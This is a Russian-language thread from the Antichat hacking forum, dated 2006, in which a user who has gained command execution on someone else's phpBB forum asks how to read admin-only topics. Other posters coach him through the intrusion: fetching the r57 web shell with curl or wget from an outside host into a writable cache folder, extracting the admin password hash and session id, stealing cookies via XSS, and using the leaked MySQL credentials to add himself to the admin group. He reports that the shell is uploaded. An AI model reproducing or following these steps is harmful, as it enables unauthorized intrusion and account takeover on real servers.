Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
phpBB. Взял Config.php. А как дальше? |
21.06.2006, 15:46
|
|
Новичок
Регистрация: 19.02.2006
Сообщений: 16
Провел на форуме:
80773
Репутация:
0
|
|
phpBB. Взял Config.php. А как дальше?
C помощю эксплоита получил доступ к файлам форума. Работают команды cat, ls, uname, rm, echo, mkdir и т.д.
Содержимое файла config.php :
PHP код:
<?php
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
$dbms = 'mysql';
$dbhost = 'localhost';
$dbname = 'xxx_forum';
$dbuser = 'xxx_forum';
$dbpasswd = 'xxx_password';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>
Для меня главная цель, это посмотреть топики которые разрешены только Группе Администраторы. И ещё как подключится к базе mySQL имея данные с config.php? Сама ссылка стандартного типа: www.xxx.ru/forum/
Подскажите пожалуйсто какой должен быть следющий шаг? |
|
|
21.06.2006, 15:48
|
|
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298
Репутация:
47
|
|
Залить шелл, оттуда выудить через MySQL hash админа и его sid. Спокойно подменить cookies и смотреть.....
Самый простой способ лить в папку cаche, она на запись всегда разрешена. И curl почти везде есть.
Значит пробираешь pwd(узнаешь папку в которой ты находишся). И пишешь curl -o путь/cache/file.txt http://rst.void.ru/download/r57shell.txt .... А потом cp путь/cache/file.txt путь/cache/file.php , и идешь путь/cache/file.php
Все расписал подробнее нельзя.
Последний раз редактировалось DimaHbl4; 21.06.2006 в 15:55..
|
|
|
|
21.06.2006, 15:59
|
|
Новичок
Регистрация: 19.02.2006
Сообщений: 16
Провел на форуме:
80773
Репутация:
0
|
|
Сообщение от DimaHbl4
Залить шелл, оттуда выудить через MySQL hash админа и его sid. Спокойно подменить cookies и смотреть.....
Залить шелл командой wget ?
т.е. пример будет такого типа:
perl phpbb.pl www.xxx.ru /forum/ 3128 "wget http://attack/shell.php"
Если да то обращение через браузер должен быть таким:
www.xxx.ru/forum/shell.php
?
команда PWD:
root@omega: pwd
--------------------------------
/usr/home/www/xxx/xxx/forum
|
|
|
|
21.06.2006, 15:59
|
|
Познающий
Регистрация: 17.06.2006
Сообщений: 76
Провел на форуме:
263627
Репутация:
32
|
|
хм... если просто смотреть админские разделы то зачем аж так парится?  простая кся и по кукам админа заходишь  ну для могучих перцев можно и вправду залить шелл командой wget(или другой смотря что пашет) и узнавать хэш админа потом его разшифрововать.... кста а нах заливать шел чтоб лазить по мискле?
разве mysql -D -h -u -p ктонить отменял? :Р и вообще если тебе известно всё по мискле то по выше перечисленой команде можно и апдейтнуть себя и перевести в группу админов |
|
|
|
21.06.2006, 16:03
|
|
Новичок
Регистрация: 19.02.2006
Сообщений: 16
Провел на форуме:
80773
Репутация:
0
|
|
Сообщение от bl4ck-cat
хм... если просто смотреть админские разделы то зачем аж так парится? простая кся и по кукам админа заходишь ну для могучих перцев можно и вправду залить шелл командой wget(или другой смотря что пашет) и узнавать хэш админа потом его разшифрововать.... кста а нах заливать шел чтоб лазить по мискле?
разве mysql -D -h -u -p ктонить отменял? :Р и вообще если тебе известно всё по мискле то по выше перечисленой команде можно и апдейтнуть себя и перевести в группу админов В Мускуле не рабираюсь  Проблема в этом... Если можете помочь стучите в асю пожалуйто - 317570777
|
|
|
|
21.06.2006, 16:09
|
|
Новичок
Регистрация: 19.02.2006
Сообщений: 16
Провел на форуме:
80773
Репутация:
0
|
|
Есть! Шелл р57 залит.
Последний раз редактировалось Cnekmp; 21.06.2006 в 16:13..
|
|
|
|
21.06.2006, 16:10
|
|
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298
Репутация:
47
|
|
bl4ck-cat
ТЫ гений чтоли......
Каким макаром ты подменишь куки в версиях старше 2.0.12 и станешь при этом админом?
Научи я тоже так хочу.
Cnekmp
Набери ls -l посмотри какие еще папки доступны на запись.... около них будет написано drwxrwxrwx
Последний раз редактировалось DimaHbl4; 21.06.2006 в 16:12..
|
|
|
|
21.06.2006, 16:14
|
|
Новичок
Регистрация: 19.02.2006
Сообщений: 16
Провел на форуме:
80773
Репутация:
0
|
|
Теперь с помощю шелла какой шаг нужно сделать?
|
|
|
|
21.06.2006, 16:15
|
|
Познающий
Регистрация: 17.06.2006
Сообщений: 76
Провел на форуме:
263627
Репутация:
32
|
|
perl phpbb.pl www.xxx.ru /forum/ 3128 "wget http://attack/shell.php"
Если да то обращение через браузер должен быть таким:
www.xxx.ru/forum/shell.php
да, да... ну а дальше если шелл зальешь то там уже разберешся... просто найди там панель управления базой и повводи все те данные про мисклю что ты раздобыл и юзай запросы к бд... хотя имхо если тебе просто читать разделы.. то проще юзнуть ксю... помоему жалобная кся там тоже пашет как и на ипб...
|
|
|
|
21.06.2006, 16:19
|
|
Познающий
Регистрация: 17.06.2006
Сообщений: 76
Провел на форуме:
263627
Репутация:
32
|
|
Диманыч
я не говорил что можно через подмену куков сделать себя админом О_о я дал 2 способа:
подменить свои куки на куки админа и заходить как этот админ
и 2 способ через мускуль добавить себя в админ группу О_о ведь если у тебя есть все данные про бд мускуля чем бы не поизменять там чего? о_О
Последний раз редактировалось bl4ck-cat; 21.06.2006 в 16:22..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
